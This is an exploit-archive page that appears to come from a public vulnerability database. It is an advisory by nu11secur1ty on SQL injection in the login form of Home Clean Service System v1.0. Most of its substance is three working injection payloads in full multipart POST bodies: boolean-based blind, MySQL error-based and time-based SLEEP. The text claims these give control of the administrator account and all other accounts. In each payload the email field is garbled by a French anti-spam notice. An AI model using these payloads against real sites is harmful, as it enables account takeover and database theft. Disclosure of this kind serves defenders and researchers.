Home[1] Files[2] News[3] Contact[4] Add New[5]
- Home Clean Service System 1.0 SQL Injection[6]
- Authored by nu11secur1ty[7]
-
Home Clean Service System version 1.0 suffers from a remote SQL injection vulnerability.
- SHA-256 |
713a953a97cc2b254906ef14b96aecd818ac74f87d3c6e66fe86d43c4f287826 - Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
## Title: Home Clean Service System v1.0 - 2022 SQLi
## Author: nu11secur1ty
## Date: 04.27.2022
## Vendor: https://www.sourcecodester.com/users/acetech
## Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System
## Description:
The `password` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the password parameter, and a database
error message was returned.
Two single quotes were then submitted and the error message disappeared.
The attacker can take administrator account control and also of all
accounts on this system, also the malicious user can download all
information about this system.
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: MULTIPART email ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"
Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. ' OR NOT 6564=6564-- aWQp
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"
------WebKitFormBoundary8kMPLwTOJeesgEBx--
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"
Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. ' AND (SELECT 6279 FROM(SELECT
COUNT(*),CONCAT(0x7176716271,(SELECT
(ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"
------WebKitFormBoundary8kMPLwTOJeesgEBx--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"
Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. ' AND (SELECT 4830 FROM
(SELECT(SLEEP(5)))kgBM)-- GxTm
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"
------WebKitFormBoundary8kMPLwTOJeesgEBx--
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System)
## Proof and Exploit:
[href](https://streamable.com/l107o6)
File Tags
- ActiveX[18] (932)
- Advisory[19] (77,211)
- Arbitrary[20] (15,053)
- BBS[21] (2,859)
- Bypass[22] (1,550)
- CGI[23] (1,010)
- Code Execution[24] (6,622)
- Conference[25] (668)
- Cracker[26] (797)
- CSRF[27] (3,267)
- DoS[28] (21,732)
- Encryption[29] (2,328)
- Exploit[30] (49,638)
- File Inclusion[31] (4,142)
- File Upload[32] (937)
- Firewall[33] (821)
- Info Disclosure[34] (2,542)
- Intrusion Detection[35] (849)
- Java[36] (2,772)
- JavaScript[37] (792)
- Kernel[38] (5,997)
- Local[39] (13,972)
- Magazine[40] (586)
- Overflow[41] (12,125)
- Perl[42] (1,410)
- PHP[43] (5,038)
- Proof of Concept[44] (2,276)
- Protocol[45] (3,284)
- Python[46] (1,385)
- Remote[47] (29,580)
- Root[48] (3,441)
- Ruby[49] (574)
- Scanner[50] (1,629)
- Security Tool[51] (7,668)
- Shell[52] (3,052)
- Shellcode[53] (1,201)
- Sniffer[54] (879)
- Spoof[55] (2,077)
- SQL Injection[56] (15,972)
- TCP[57] (2,349)
- Trojan[58] (672)
- UDP[59] (866)
- Virus[60] (658)
- Vulnerability[61] (30,361)
- Web[62] (8,965)
- Whitepaper[63] (3,710)
- x86[64] (942)
- XSS[65] (17,289)
- Other[66]
File Archives
- April 2022[67]
- March 2022[68]
- February 2022[69]
- January 2022[70]
- December 2021[71]
- November 2021[72]
- October 2021[73]
- September 2021[74]
- August 2021[75]
- July 2021[76]
- June 2021[77]
- May 2021[78]
- Older[79]
Systems
- AIX[80] (424)
- Apple[81] (1,875)
- BSD[82] (368)
- CentOS[83] (55)
- Cisco[84] (1,911)
- Debian[85] (5,948)
- Fedora[86] (1,690)
- FreeBSD[87] (1,241)
- Gentoo[88] (4,152)
- HPUX[89] (876)
- iOS[90] (317)
- iPhone[91] (108)
- IRIX[92] (220)
- Juniper[93] (67)
- Linux[94] (41,908)
- Mac OS X[95] (683)
- Mandriva[96] (3,105)
- NetBSD[97] (255)
- OpenBSD[98] (478)
- RedHat[99] (11,351)
- Slackware[100] (941)
- Solaris[101] (1,605)
- SUSE[102] (1,444)
- Ubuntu[103] (7,740)
- UNIX[104] (9,047)
- UnixWare[105] (183)
- Windows[106] (6,364)
- Other[107]
- Services
- Security Services[118]
- Hosting By
- Rokasec[119]


